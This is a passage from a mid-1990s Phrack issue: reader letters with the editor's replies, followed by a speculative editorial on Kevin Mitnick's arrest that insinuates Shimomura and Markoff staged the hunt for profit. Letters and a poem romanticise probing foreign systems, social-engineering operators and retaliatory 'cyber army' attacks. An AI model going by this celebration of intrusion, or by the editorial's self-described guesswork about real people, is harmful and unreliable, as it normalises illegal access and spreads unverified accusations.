  769. seem to know anything about either company.  They guy I talked to said it
  770. was real strange that LD INC didn't give me a number to call at
  771. Northstar, since most of this type of thing is handled by phone.  I'm
  772. beginning to wonder exactly how relieable this LD INC company is, who
  773. Northstar is, and most of all who called and how the hell the call was
  774. supposedly accepted by my phone.  This is all the info I know:
  775.  
  776. BILLED ON BEHALF OF NORTHSTAR COMMUNICATION
  777.  
  778. 1.  SEP 18 923PM COL CLEARWATER FL 813-524-5111 NC 13:00 51.87
  779.  
  780. --From my phone bill
  781.  
  782. Northstar Communication
  783. 3665 East Bay Drive
  784. Suite 204-192
  785. Largo, FL 34641
  786.  
  787. --From LD INC
  788.  
  789. Long Distance Billing Co., Inc.
  790.  
  791. 1-800-748-4309
  792.  
  793. --From NYNE phone bill.
  794.  
  795. If you can think of anything I can do, I;d be really greatful.  I don't
  796. have $50 to throw away on a call I never got, and I don't have the
  797. resources you do to try and figure out who the hell these people are.
  798.  
  799. [It looks to me like you got fucked by someone in Florida using a COCOT
  800.  payphone.  It's kind of odd that NYNEX couldn't help you more...but anyway,
  801.  I wouldn't pay it.
  802.  
  803.  What I suspect happened was that somsone used one of those handy COCOT
  804.  services where the operators are incredibly stupid and allow calls
  805.  to be accepted when the "calling party" says "YES" to allow a 3rd party or
  806.  collect call, rather than the party being called.  This happened to me at
  807.  my previous work extension by New Yorkers using the ENCORE service (even
  808.  though all our lines were listed to refuse 3rd party and collect calls.)]
  809.  
  810. -----------------------------------------------------------------------------
  811.  
  812. I've been having some trouble with the law, so all my notes are stashed at
  813. a friend's casa at the moment.  Can you recommend a good lawyer to defend me
  814. for allegedly hacking some government computers?  I've got a good crim def
  815. guy working with me right now assisting me guring questioning from Special
  816. Agents, but I will need someone that has experience if I get indicted.
  817.  
  818. [If you are facing computer crime charges, you are definately in
  819.  a world of hurt.  There are very few computer crime-savvy lawyers
  820.  practicing in the World.  The only thing I can suggest is that
  821.  you call EFF, CPSR or EPIC and ask them if they know of any
  822.  lawyers in your area that they can refer you to.  None of these
  823.  groups will help you directly, except under EXTREME circumstances, and
  824.  only if you have been falsely accused, or have had rights violated.
  825.  If you are guilty, and the cops have any evidence, you are going to be
  826.  convicted.
  827.  
  828.  Remember Baretta?  "If you can't do the time, then don't do the crime."]
  829.  
  830.  
  831. -----------------------------------------------------------------------------
  832.  
  833. Dear Chris,
  834.  
  835. You probably don't remember me, but we corresponded about 3 years
  836. ago as part of my PhD research.  I was at Edinburgh University
  837. at the time and am not at UMIST in Manchester (British equivalent of MIT).
  838.  
  839. The reson I'm writing is that I was awarded my PhD last March, and for one
  840. reason and another I've been sidetracked into a completely different field
  841. of research - the British National Health Service and the various ways
  842. computers are being used in it.
  843.  
  844. I tried getting a publisher interested in the thesis, but with little luck.
  845. I also sent it to Jim and Gordon at CuD on disk for them to stick it on
  846. archive, but they had problems with the formatting of it and don't seem to
  847. have got round to archiving i.
  848.  
  849. If you're interested I'd be quite happy to send a couple of disks to you
  850. and you can spread it around as you want.  It just seems a shame for the people
  851. on the net not to get a look at it.  It's dressed up in airy-fairy sociological
  852. language - but there's still lots in it that I think would be of interest to
  853. people on the net.  I saw your interview in CuD, and I agree with you about
  854. most of the books written on the CU.  Mine has its faults but it's got less
  855. biographical data and more issue-oriented stuff.
  856.  
  857. Anyway, get in touch and let me know if I can find a good home for my magnum
  858. opus.
  859.  
  860. Take care and a belated thanks for all the time you spent in helping me with
  861. the PhD.
  862.  
  863. Best Wishes,
  864.  
  865. Paul Taylor
  866. School of Management
  867. UMIST
  868.  
  869. [Paul:
  870.  
  871.  Congrats on your PHD, and continued success at UMIST!
  872.  I'm putting your thesis up on the Phrack WWW page so that more
  873.  people can get a look at it!
  874.  
  875.  Thanks for sending it!]
  876.  
  877. -----------------------------------------------------------------------------
  878.  
  879. I read your article on hacking the French among other foreign governments.
  880. Sounds pretty fun, just for kicks the other night I did a search of all the
  881. computers I could get at in China.  One of them was a national power grid
  882. computer. Sounds like it could be fun to play with huh?  The "They Might Kill
  883. Us" part will tend to turn some people off, but not me.
  884.  
  885. [WOW!  A National Power Grid Computer!  In China!  Gee.  How many times
  886.  have you seen Sneakers?  Take the tape out of your VCR, slowly run
  887.  a rare-earth magnet over it and set it on fire.
  888.  
  889.  On the other hand, if you were at least partally serious about the
  890.  hacking for America, keep your eyes open.]
  891.  
  892.  
  893. -----------------------------------------------------------------------------
  894.  
  895. Erikb,
  896.  
  897. Regarding your article in Phrack 46, we here in Columbus would
  898. just like to say that everything except for the Krack Baby's phone number,
  899. which long since went down, and the Free Net template, is total and utter
  900. bullshit.  The Columbus 2600 meetings were NOT started by Fungal Mutoid, he
  901. is just responsible for a much larger turnout since about September (94), and
  902. whoever wrote that has obviously not been to a Columbus meeting recently.
  903. The Columbus 2600's have been here for quite a while, but bacause the H/P
  904. scene consists of 15 people AT THE MOST, many of which haven't the time to
  905. attend, the turnout is almost always low.  I believe the most that have ever
  906. shown up to a meeting is 10, which dwindled to 8 or so before the
  907. meeting was officially half-over.  Nobody knows who wrote the article which
  908. you printed, although no one has been able to contact Fungal Mutoid to ask him.
  909. Just thought we'd clear a few things up, and to those that don't give two
  910. flying shits, we're sorry to have to bring this into a E-mag as great as
  911. this.
  912.  
  913. Sincerely,
  914.  
  915. H.P. Hovercraft and
  916. the Columbus H/P Gang
  917.  
  918. [Thanks for the letter.  Like I always say, I can only report and print what
  919.  I'm told or what is sent to me.  I don't live anywhere but Austin, TX, so
  920.  I don't know the intimacies of other areas.  Thanks for sending in your
  921.  comments though!]
  922.  
  923. -----------------------------------------------------------------------------
  924.  
  925. Haiku
  926.  
  927. Operator hi
  928. who is it that sets my phone
  929. on redial and tone
  930.  
  931. gives me rest in times
  932. great stress lays its head on my
  933. leads me into joy
  934.  
  935. cosmos and mizar
  936. give evidence and homage
  937. to your greatness, why
  938.  
  939. logon/password
  940. on your very first try shall
  941. succeed, as always
  942.  
  943. oh, A T and T
  944. while great, holds non to the great
  945. power that NYNEX
  946.  
  947. gives access to in
  948. glee, awaitnig, cautiously,
  949. for signs of entry
  950.  
  951. illicitly thus
  952. strives to maintain control of
  953. the ESS switch,
  954.  
  955. not comprehending
  956. that control is simply gained
  957. by a single call
  958.  
  959. to some stupid yet
  960. revered operator who
  961. believes you in charge
  962.  
  963. gives out system pass
  964. with some small feat of trick'ry
  965. PAD to PAD, too, works
  966.  
  967. sounding of the baud
  968. with modem and coupler
  969. connection is made
  970.  
  971. who is to question
  972. the incidence of this fault
  973. or acknowledge it
  974.  
  975. security's words
  976. false threats followed by arrest
  977. on illegal grounds
  978.  
  979. hackers, phreakers grieve
  980. free the unjustly accused
  981. give them freedom to
  982.  
  983. ROAM with cellular
  984. phones place to place with no charge
  985. test the system's worth
  986.  
  987. find holes, detect bugs
  988. run systems by remote, yea,
  989. to explore, to seek,
  990.  
  991. to find a network
  992. of free bits and bytes unharmed--
  993. innocently seen.
  994.  
  995. who doesn't know that
  996. Bell or Sprint or MCI
  997. would never approve--
  998.  
  999. believe in 'puter crime,
  1000. toll fraud, "access devices,"
  1001. free calls to Denmark
  1002.  
  1003. Information is
  1004. power is imperative
  1005. proprietary
  1006.  
  1007. please, spare me the grief
  1008. accusations being thrown
  1009. of phone co. crashes
  1010.  
  1011. are fiction unleashed
  1012. to the ignorant public
  1013. eye to make blame, fear
  1014.  
  1015. all phr/ackers, but all
  1016. have had their days and faded
  1017. into the past, why
  1018.  
  1019. must ignorant block
  1020. the free flow of knowledge found
  1021. angry sysops abound
  1022.  
  1023. secret service rais
  1024. hoisting games, computers, phones
  1025. never to be re-
  1026.  
  1027. turned hackers, phreakers
  1028. working for government, spies,
  1029. lies, deception, all
  1030.  
  1031. to walk free while friends
  1032. spend years in jail for simply
  1033. battling for some change
  1034.  
  1035. knowledge is NOT free
  1036. equipment costing milliions,
  1037. simply cannot pay
  1038.  
  1039. the cost for systems
  1040. of signal switching; no on e
  1041. wants to harm, just try
  1042.  
  1043. to use our knowledge
  1044. in a constructive way and
  1045. look around for things
  1046.  
  1047. which further know-how
  1048. of packet switching, ANI,
  1049. proctor tests and tones
  1050.  
  1051. which make little sense
  1052. and why is it there, what are
  1053. all the test lines for?
  1054.  
  1055. central office trash
  1056. provides some clues, while phone calls
  1057. get angry response
  1058.  
  1059. to inquiries re:
  1060. loops and lack of barriers,
  1061. COCOT carriers
  1062.  
  1063. who overcharge cause
  1064. frustraton, must be helped
  1065. end overbilling
  1066.  
  1067. unfairness is only
  1068. people not understanding
  1069. nor comprehending
  1070.  
  1071. that what we do is
  1072. NOT always fraud, vengeance or
  1073. deceitful reasons
  1074.  
  1075. bu for love of the
  1076. systems, curiosity's
  1077. overwhealming need
  1078.  
  1079. to be met and to
  1080. feel accomplished, proud, to
  1081. do and know something
  1082.  
  1083. WELL crackers abound
  1084. pirates do multiply, spread
  1085. wavez of warez cross coasts
  1086.  
  1087. and foreign countries
  1088. virus creators seeking
  1089. escape, growth, freedom
  1090.  
  1091. not for destruction
  1092. but for change, to press limits
  1093. to find that which makes
  1094.  
  1095. us whole, complete, and
  1096. accomplished at crossing
  1097. the barriers that
  1098.  
  1099. bound conventional
  1100. people in dead-end jobs with
  1101. little self-esteem.
  1102.  
  1103. hacking, phreaking, it
  1104. is an art form, and a quest
  1105. for endless reaches
  1106.  
  1107. to seek, to explore, to
  1108. realize and accomplish, to
  1109. take chances and live
  1110.  
  1111. not for rules and laws
  1112. but for what things should be but
  1113. will not come to pass.
  1114.  
  1115.  
  1116. --kyra
  1117.  
  1118. [Uh oh, we're getting pretty literary here.  I can see it now:
  1119.  
  1120.  Phrack Magazine.  For the Sensitive Hack/Phreak.
  1121.  
  1122.  Interesing poem tho...]
  1123.  
  1124.  
  1125. -----------------------------------------------------------------------------
  1126.  
  1127. Dear Editor of Phrack Magazine;
  1128. Ok Erik (mr. editor), there is also a poem that I have written for Wei.
  1129.  
  1130. "Thinking of Ding Wei"
  1131. (C) 1994, 1995 Oliver Richman.
  1132.  
  1133. Come here, let me tell you something,
  1134. How I hide my love for Wei Ding:
  1135. By forgetting all my thinking!
  1136.  
  1137. When in my mind Wei's heart I see..
  1138. I want to tell her "wo ai ni",
  1139. So her and I will always be.
  1140.  
  1141. Her mind is pure, like pretty Jade..
  1142. She makes me want to give her aid.
  1143. I know that her love will not fade.
  1144.  
  1145. My patience tries to move the sea.
  1146. But can I deny you and me?
  1147. I want our hearts to set us free.
  1148.  
  1149. I really love you, dear Ding Wei,
  1150. I think about you every day.
  1151. Tell me, what more can I say?
  1152.  
  1153. [What's this?  Another Poem?  A tribute of Love for some chick named Wei?
  1154.  Holy Lord.  We need to get some codes or credit cards or something in here
  1155.  to offset this burst of "Heartfelt Emotive Print." ]
  1156.  
  1157. -----------------------------------------------------------------------------
  1158.  
  1159. the other day upon the stair
  1160. i met a man who wasn't there
  1161. he wasn't there again today
  1162. i think he's from the CIA
  1163.  
  1164.  
  1165. [NOW THIS IS MY KIND OF POETRY!  SHORT, SIMPLE, AND FUNNY.
  1166.  WHATEVER HAPPENED TO BENNETT CERF???]
  1167.  
  1168. -----------------------------------------------------------------------------
  1169.  
  1170. As a former AOLite and definite wannabe, and having d/l the log of
  1171. the Rushkoff/Sirius hypechat, I could tell from the beginning that it
  1172. would be just as you reviewed _Cyberia_ as being.  Every other word
  1173. Rushkoff used was Cyberia or Cyberians.  As lueless and vulnerable to hype
  1174. as I was, I couldn't help but stand back and listen to all the shit with a
  1175. grin.  In the same not, I ran into David Brin on AOL as well, and managed
  1176. to get a correspondence goig with him.  He was on discussing all the
  1177. research he did on the "Net" and about the papers he was delivering, and,
  1178. most importantly (of course), his upcoming BOOK about the Internet and
  1179. privacy.  At the time, still under the glossy spell of Wired (which I still
  1180. find interesting) and the hype, I was eager to offer him an interview
  1181. proposal, which I would have published in Wired if at all possible.
  1182.  
  1183. Dr. Brin knew less than *I* did about the Internet.  I can sum up most of
  1184. these people's vocabularies in one word:  "BLAH."  They may as well
  1185. reiterate that syllable ad infinitum--it amounts to the same thing.
  1186.  
  1187. [WOW!
  1188.  
  1189.  Hey Cyber-guy, thanks for the super-cyber email.  As we cruise along this
  1190.  InfoBanh, exiting in Cyberia, it takes a diligent cyberian like you
  1191.  to keep things in check!
  1192.  
  1193.  Sorry bout that.  I was overcome with a minor brain malfunction that
  1194.  reduced my IQ to that of Douglas Rushkoff.  Doesn't it all make you want
  1195.  to puke?
  1196.  
  1197.  I heard that yesterday on the soap opera "Loving" some character was hacking
  1198.  into food companies to steal recipes.  A month or so back, on "All My
  1199.  Children"  (The only soap I watch...but I'm embarrassed to say I watch it
  1200.  religiously), Charlie & Cecily were dorking around on the Internet, and
  1201.  sent each other email after reading notes they each left on alt.personals.
  1202.  
  1203.  The world is coming to an end.]
  1204.  
  1205. -----------------------------------------------------------------------------
  1206.  
  1207. Yo erikb:
  1208.  
  1209. yo dewd.  eye am so paranoid, my t33th are rattling.
  1210. what dewd eye dew?
  1211. yew are the god of the internet.
  1212. how dew eye stop the paranoia?
  1213. please print answer in next phrack.
  1214. thanx.
  1215. m0fo
  1216.  
  1217. [Your Acid will wear off in a few hours.  Don't worry.  Enjoy it.
  1218.  The CIA does.
  1219.  
  1220.  If it doesn't go away in a few days, there are some nice men in
  1221.  white lab coats who will be glad to help you out.
  1222.  
  1223.  How do you stop the paranoia?  Your answer:  Thorazine!]
  1224.  
  1225. -----------------------------------------------------------------------------
  1226.  
  1227. This is Nemo Kowalski speaking (aka Paolo Bevilacqua).
  1228. I just discovered Phrack at the young age of 31. ;-)
  1229. Well, I like it a lot, at least like I enjoyed doing real
  1230. things here in Europe, alone and with DTE222, years ago.
  1231. I'm going to write something about the first anti-hacker operation
  1232. in Italy, "Hacker Hunter," in which, incidentally, I got busted.
  1233. Do you think your some of the old stories from altger and Itapac
  1234. can be of interest to your readers?
  1235.  
  1236. To Robert Clark:
  1237.  
  1238. I read "My Bust" and I liked it.  I'm not a native english speaker,
  1239. but I think it was well-written, plus principally, I felt a pleasant
  1240. "reader sharing writer's experiences" sensation that can separate a good
  1241. reading from pure BS.  This is expecially true since I've been busted here
  1242. in Italy, and I've learned that things are more similar around the
  1243. western world than I would have thought.
  1244.  
  1245. The only thing I can't share is your Seattle experience.   Maybe the dichotomy
  1246. good druge/bad drugs has a different meaning for you?
  1247.  
  1248. Respect,
  1249.  
  1250. Nemo
  1251.  
  1252. [Nemo:
  1253.  
  1254.  Please write as much or as little as you like about the busts in
  1255.  Italy!  We have an article this issue about Italy, but any further
  1256.  insights into your experiences, esspecially regarding how busts
  1257.  are carried out in other countries would be greatly appreciated by
  1258.  our readers!
  1259.  
  1260.  I look forward to reading whatever you can put together!]
  1261.  
  1262. -----------------------------------------------------------------------------
  1263.  
  1264. Chris,
  1265.  
  1266. As a relative neophyte to hacking, one of the problems I come up with a
  1267. lot is identifying systems I locate scanning.  So, I was wondering if Phrack,
  1268. or any other zine, had ever published a concise guide to clues to
  1269. help identify unknown systems.  If so, could you please let me know what
  1270. mag, and what issue.
  1271.  
  1272. One last thing, are there any internet sites with info of interest to hackers?
  1273. I know about eff.org and freeside.com and a few others, but nothing really
  1274. intriguing...any suggestions?
  1275.  
  1276. [You will find a good start to identifying strange systems, and in
  1277.  locating sites of interest to hackers in the #Hack FAQ we've printed
  1278.  in this issue.  ]
  1279.  
  1280. -----------------------------------------------------------------------------
  1281.  
  1282. For Phrack news, Darkman was busted in Winnipeg City, Canada, for various
  1283. reasons, but since I knew him personally I wanted to add my two cents.
  1284. For the record, he was busted for warez and porn as well as hacking into the
  1285. UoManitoba, and I heard his wife left him because he spent too much time
  1286. pirating on IRC.  He was about 38.  He could read fluently in Russign, and
  1287. I remember one night we discovered some secret KGB documents from the 50's,
  1288. real science fiction thriller stuff, and he read it to me.
  1289.  
  1290. Akalabeth
  1291.  
  1292. [It's a drag that your friend was busted, and knowing the Canadian
  1293.  government, the porn part was probably pretty minor shit in a worldly
  1294.  sense.
  1295.  
  1296.  I'm kinda intrugued by the "KGB Documents" you found.  Uh, were these on
  1297.  the net?  Did you have a cyrillic character set loaded?  How did you
  1298.  read these documents?  Were they on paper?
  1299.  
  1300.  SEND THEM TO PHRACK!  :)  ]
  1301.  
  1302. -----------------------------------------------------------------------------
  1303.  
  1304. Top 10 Reasons Why I Should Get My Subscription FREE:
  1305.  
  1306. (1)  I'm a programmer/Analyst for an electric utility company in Texas
  1307.      (ahh, come on - I'm a fellow Texan!)
  1308.  
  1309. (2)  I've read Phrack for years (loyalty scores points - right?)
  1310.  
  1311. (3)  I've been involved with compuers since GOD created the PC
  1312.      (I began in late 70's-early 80's).
  1313.  
  1314. (4)  I'm *not* a narc (shh, don't tell anybody.)
  1315.  
  1316. (5)  I *may* have a record (but if I do, it's for minor kind of stuff -
  1317.      I'm basically a nice guy).
  1318.  
  1319. (6)  I don't like the telephone company (you have to admit they're amusing
  1320.      though.)
  1321.  
  1322. (7)  I know how to get around on the 'net (can't you tell - I have an AOL
  1323.      account <g>.)
  1324.  
  1325. (8)  I'm a good source of info regarding all types of mainframe and PC
  1326.      programming.
  1327.  
  1328. (9)  PLEASE....
  1329.  
  1330. (10) I'll quit writing dumb letters and trying to be funny.
  1331.  
  1332. [David Letterman is in the background throwing up as I'm typing
  1333.  
  1334.  Don't quit your day job...but I'll send you Phrack anyway. :) ]
  1335.  
  1336. -----------------------------------------------------------------------------
  1337.  
  1338. Hey Chris,
  1339.  
  1340. I just read your thing in Phrack abou the US being attacked by our so
  1341. called "allies" and I agree with you 110%!  I do believe that we should start
  1342. some sort of CyberArmy to fight back.  I don't think that our government
  1343. would mind, unless we crashed an economy that they were involved with or
  1344. something, but hell, they fuck with us, let's fuck with them.  And you were
  1345. saying about phone costs, isn't it possible to just telnet or something over
  1346. there?  And why stop at fighting back against our information agressors, why
  1347. not fight back against other countries that our government is too chickenshit
  1348. to fight against?  Cuba comes to mind.  Well, I hope you reply or something, I
  1349. really like Phrack, I try to get it whenever I can manage, but I don't
  1350. have an internet address where I can get files.  Keep up the good work.
  1351.  
  1352. [Yet another volunteer for the US Cyber Corp!  By God, I'll have
  1353.  an army yet.  :)  ]
  1354.  
  1355. -----------------------------------------------------------------------------
  1356.  
  1357.  
  1358.                               ==Phrack Magazine==
  1359.  
  1360.                  Volume Six, Issue Forty-Seven, File 2a of 23
  1361.  
  1362. *****************************************************************************
  1363.  
  1364.                                 Phrack Editorial
  1365.  
  1366. What you are about to read is pure speculation on my part.  Do not take
  1367. this to be 100% fact, since most of it is hypothesis.  But it sure will
  1368. make you think twice.  "Ever get the feeling you're being cheated?"
  1369.  
  1370. -----------------------------------------------------------------------------
  1371.  
  1372. So...Mitnick was busted.
  1373.  
  1374. There certainly are some really odd things regarding the whole mess,
  1375. especially with regards to the "investigating" being done by
  1376. a certain heretofore unheralded "security" professional and
  1377. a certain reporter.
  1378.  
  1379. One of the first oddities was the way the Mitnick saga suddenly
  1380. reappeared in the popular media.  In February, and seemingly out of
  1381. nowhere, the ever diligent John Markoff entered the scene with the
  1382. a groundbreaking story.  (Of course this is meant to be sarcastic as
  1383. hell.)  Markoff's story dealt with a near miss by federal authorities
  1384. trying to apprehend Mr. Mitnick in Seattle about 5 months prior.
  1385.  
  1386. Now, if nothing else happened in the whole Mitnick saga, I never would
  1387. have given this a second thought, but in light of what followed,
  1388. it really does seem odd.  Why would someone write about a subject that
  1389. is extremely dated of no current newsworthiness?  "Our top story tonight:
  1390. Generalissimo Francisco Franco is still dead."
  1391.  
  1392. To be fair, I guess Markoff has had a hard on for Mitnick for ages.
  1393. Word always was that Mitnick didn't really like the treatment he got
  1394. in Markoff's book "Cyberpunk" and had been kinda screwing with him for
  1395. several years.  (Gee, self-proclaimed techie-journalist writes something
  1396. untrue about computer hackers and gets harassed...who would have thought.)
  1397. So it really isn't that odd that Markoff would be trying to stay abreast
  1398. of Mitnick-related info, but it certainly is odd that he would wait
  1399. months and months after the fact to write something up.
  1400.  
  1401. But wait, a scant month and a half later, Mitnick gets busted!  Not
  1402. just busted, but tracked down and caught through the efforts of a
  1403. computer security dude who had been hacked by Mitnick.  Breaking the
  1404. story was none other than our faithful cyber-newshawk, John Markoff.
  1405.  
  1406. "Tsutomo Shimomura, born to an American mother and a Japanese father,
  1407. thus becan life as he was destined to live it...going in several
  1408. directions at once.  A brilliant neurosurgeon, this restless young man
  1409. grew quickly dissatisfied with a life devoted solely to medicine.
  1410. He roamed the planet studying martial arts and particle physics,
  1411. colelcting around him a most eccentric group of friends, those
  1412. hard-rocking scientists The Hong Kong Cavaliers.
  1413.  
  1414. "And now, with his astounding jet car ready for a bold assault on the
  1415. dimension barrier, Tsutomo faces the greatest challenge of his turbulent
  1416. life...
  1417.  
  1418. "...while high above Earth, an alien spacecraft keeps a nervous watch on
  1419. Team Shimomura's every move..."
  1420.  
  1421. Wait a minute...that's Buckaroo Banzai.  But the similarities are almost
  1422. eerie.  Security dude by day, hacker tracker by night, ski patrol
  1423. rescue guy, links to the NSA!  WOWOW!  What an incredible guy!  What an
  1424. amazing story!
  1425.  
  1426. But wait!  Let's take a closer look at all of this bullshit, before it
  1427. becomes so thick all we can see is tinted brown.
  1428.  
  1429. Shimomura was supposedly hacked on Christmas Eve by Kevin Mitnick, which
  1430. set him off on a tirade to track down the guy who hacked his system.
  1431. Supposedly numerous IP tools were taken as well as "millions of dollars
  1432. worth of cellular source code."
  1433.  
  1434. First off, Shimomura's TAP is available via ftp.  Modified versions of this
  1435. have been floating around for a while.  I suppose it's safe to assume that
  1436. perhaps Tsutomo had modified it himself with further modifications (perhaps
  1437. even some of the IP/localhost spoofs that the X-consortium guys were
  1438. playing with, or maybe other tricks like denial of service and source-routing
  1439. tricks...I don't really know, I don't have any such thing authored by
  1440. Shimomura.)
  1441.  
  1442. Secondly, what is all this cellular source code?  And why did Shimomura have
  1443. it?  Could it be that this is really just some kind of smokescreen to make
  1444. it seem like Mitnick did something bad?  For those of you who don't know,
  1445. Tsutomo is friends with Mark Lottor (yes, the OKI experimenter, and CTEK
  1446. manufacturer.).  They have been friends for some time, but I don't know
  1447. how long.  Lottor used to be roommates with, lo and behold, Kevin Poulsen!
  1448. Yes, that Kevin Poulsen...the guy who before Mitnick was the "computer
  1449. criminal de jour."  Poulsen and Mitnick were no strangers.
  1450.  
  1451. It wouldn't be too much of a stretch of the imagination to think that
  1452. those files were really ROM dumps from phones that Lottor had given
  1453. Shimomura.  It also wouldn't be too much of a stretch to imagine that
  1454. Mitnick knew Tsutomo, and decided to go poke around, pissing off
  1455. Tsutomo who knew that he'd been violated by SOMEONE HE ACTUALLY KNEW!
  1456. (It sure does piss me off much more to get fucked over by someone I know
  1457. rather than a complete stranger.)
  1458.  
  1459. Woah.  If any of that is true, what strange bedfellows we have.  But wait,
  1460. it gets better...
  1461.  
  1462. Enter John Markoff.  Markoff and Tsutomo have obviously known each other for
  1463. a while.  I don't know where they met...but I know they were together
  1464. at Defcon, maybe at Hope, and probably at the Tahoe Hacker's conference
  1465. a few years back.  (I'd have to go back and look over the group
  1466. photos to be certain.)
  1467.  
  1468. Markoff already has a stake in the Mitnick story, since it was his book,
  1469. "Cyberpunk" that really gave ol' Kevin some coverage.  Now, if Markoff knew
  1470. that Mitnick had hacked Tsutomo (from Tsutomo's own mouth), then certainly
  1471. any journalist worth his salt would see possibilities.  Gee, what a great
  1472. concept!  A colorful computer security guy tracks down one of the world's
  1473. most wanted hackers!  What a great story!  Remember that Stoll Guy?
  1474.  
  1475. But in order to get the book publishers really hot, it would take some more
  1476. press to rejuvinate interest in the Mitnick story.  So the first story,
  1477. months after the fact, is printed.
  1478.  
  1479. Meanwhile, Tsutomo is supposedly tracking down Mitnick.
  1480.  
  1481. How does one track down a hacker?  The legal (and really annoyingly hard way)
  1482. is to work with other system administrators and establish a trail via
  1483. tcp connects and eventually back to a dialup, then work with phone companies
  1484. to establish a trap and trace (which usually takes two or three calls) and
  1485. then working with local police to get a warrant.  Somehow Tsutomo seemingly
  1486. managed to avoid all this hassle and get a lot done by himself.  How?
  1487. Well, the Air Force OSI managed to track down the British Datastream Cowboy
  1488. by hacking into the systems he was hacking into the Air Force from.  This is
  1489. the easy way.  Hmmm.
  1490.  
  1491. I know with a good degree of certainty that Markoff's and Tsutomo's little
  1492. escapades pissed off a great many people within law enforcement, but I don't
  1493. know exactly why.  If they WERE bumbling around stepping on FBI toes
  1494. during the course of their litle hunt, certainly the FBI would have
  1495. threatened them with some kind of obstruction of justice sentence if they
  1496. didn't stop.  Did they?
  1497.  
  1498. Well before any of this had begun, Mitnick had been hacking other places
  1499. too. Guess what?  He happened to hack CSCNS, where a certain ex-hacker, Scott
  1500. Chasin, runs the security side of things. I remember well over a year ago
  1501. talking to Chasin about a hacker who had breeched CNS.  Discussing his
  1502. methods, we thought it must be Grok, back from the netherworld, since he
  1503. was so skilled.  The hacker also made claims of being wireless to avoid
  1504. being traced.  (This also fit into the Grok modus operandi...so we just
  1505. assumed it was indeed Grok and left it at that.)  Chasin told the hacker
  1506. to get off of CNS, and that he could have an account on crimelab.com, if
  1507. he would only use it for mail/irc/whatever, but with no hacking, and on
  1508. the agreement that he would leave CSCNS alone.
  1509.  
  1510. The agreement was made, but went sour after only a few weeks when the mystery
  1511. hacker began going after CSCNS again.  The Colorado Springs FBI was called
  1512. in to open an investigation.  This was ages ago, but of course, field agencies
  1513. rarely talk.
  1514.  
  1515. Back in the present, Tsutomo goes to help out at the Well, where
  1516. a certain admin (pei) was having problems with intruders.  This is the
  1517. same pei who a few months earlier told Winn Schwartau "The Well has no
  1518. security!" Which Winn reported in his newsletter.  (This of course came after
  1519. Winn's account on the Well was reactvated by an anonymous person who
  1520. posted several messages about Markoff and signed them "km."  DUH!)
  1521.  
  1522. So somehow, Tsutomo gets trace information leading back to a cell site in
  1523. North Carolina.  How does a private citizen get this kind of information?
  1524. Don't ask me!  My guess is that the feds said, give us what you know,
  1525. help us out a bit and don't get in our way.  In return, one can surmise
  1526. that Tsutomo (and Markoff) got to glean more info about the investigation
  1527. by talking with the feds.
  1528.  
  1529. So, Mitnick gets busted, and Tsutomo got to ride around in a car with
  1530. a Signal Strength Meter and help triangulate Mitnick's cellular activity
  1531. to his apartment.  Woo woo!
  1532.  
  1533. After all is said and done, Tsutomo has single handedly captured Mitnick,
  1534. John Markoff breaks the story on the FRONT PAGE of the New York Times, and
  1535. every other computer reporter in America continually quotes and
  1536. paraphrases Markoff's story and research as "God's Own Truth."
  1537.  
  1538. Mitnick, on the other hand, gets blamed for:
  1539.  
  1540.  1) hacking Tsutomo
  1541.  2) hacking the Well
  1542.  3) hacking Netcom to get credit cards
  1543.  4) hacking CSCNS
  1544.  5) hacking Janet Reno's Cell Phone
  1545.  6) hacking motorola
  1546.  7) conversing with foreign nationals
  1547.  etc..
  1548.  
  1549. Let's look at some these charges:
  1550.  
  1551. 1) Mitnick was not the first (or only) to hack Tsutomo.  The San Deigo
  1552.    Supercomputer Center is a target for a lot of people.  It's a major
  1553.    Internet center, and there are all kinds of goodies there, and the
  1554.    people who work there are smart guys with nice toys.  Sorry, but
  1555.    Mitnick is the scapegoat here.
  1556.  
  1557. 2) Mitnick was not the first, last, or most recent to hack The Well.
  1558.    Like Pei said, "The Well Has No Security."  I know this first hand,
  1559.    since I have an account there.  I don't raise a stink about it,
  1560.    because I pay by check, and my email is boring.
  1561.  
  1562. 3) Mitnick was not the person who got the Netcom credit card file.
  1563.    That file floated around for quite some time.  He might have had
  1564.    a copy of it, but so do countless others.  Sorry.  Wrong again.
  1565.  
  1566. 4) Mitnick was in CNS.  He was not the only one.  Thanks for playing.
  1567.  
  1568. 5) The thought that Mitnick could reprogram a MTSO to reboot upon
  1569.    recognizing a ESN/MIN pair belonging to one specific individual
  1570.    would require that he had hacked the manufacturer of the MTSO, and
  1571.    gotten source code, then hacked the cellular carrier and gotten
  1572.    a full database of ESN/MIN information.  Both of these things have
  1573.    been done by others, and Mitnick certainly could have done them too,
  1574.    but I doubt he would have gone to that much trouble to call attention
  1575.    to his actions.
  1576.  
  1577. 6) Motorola, like EVERY other big-time computer industry giant has been
  1578.    hacked by countless people.
  1579.  
  1580. 7) Mitnick reportedly had dealings with foreign nationals, especially
  1581.    one "Israeli" that set the CIA up in arms.  Well, sure, if you get on
  1582.    IRC and hang out, you are probably going to talk to people from other
  1583.    countries.  If you hang out on #hack and know your stuff, you will probably
  1584.    end up trading info with someone.  But, playing devil's advocate,
  1585.    perhaps the person you might be talking to really isn't a 22 year old
  1586.    Israeli student.  Maybe he really is a 40 year old Mossad Katsa working
  1587.    in their computer center.  Was Mitnick Jewish?  Would he do "whatever
  1588.    it takes to help the plight of Jews worldwide?"  Could he have been
  1589.    approached to become one of the scores of sayanim worldwide?  Sure.
  1590.    But probably not.  He'd be too hard to call on for the favors when they
  1591.    would be needed by Mossad agents.  So, I have some doubts about this.
  1592.  
  1593. Less than a month after the whole bust went down, Markoff and Tsutomo
  1594. signed with Miramax Films to produce a film and multimedia project
  1595. based on their hunt for Mitnick.  The deal reportedly went for
  1596. $750,000.  That is a fuckload of money.  Markoff also gets to do a book,
  1597. which in turn will become the screenplay for the movie.  (Tsutomo
  1598. commented that he went with Miramax "based on their track record."
  1599. Whatever the fuck that means.)
  1600.  
  1601. Less than a month and they are signed.
  1602.  
  1603. Looks to me like our duo planned for all this.
  1604.  
  1605. "Hey Tsutomo, you know, if you went after this joker, I could write a book
  1606. about your exploits!  We stand to make a pretty penny.  It would be
  1607. bigger than the Cuckoo's egg!"
  1608.  
  1609. "You know John, that's a damn good idea.  Let me see what I can find.
  1610. Call your agent now, and let's get the ball rolling."
  1611.  
  1612. "I'll call him right now, but first let me write this little story to
  1613. recapture the interest of the public in the whole Mitnick saga.  Once that
  1614. runs, they publishers are sure to bite."
  1615.  
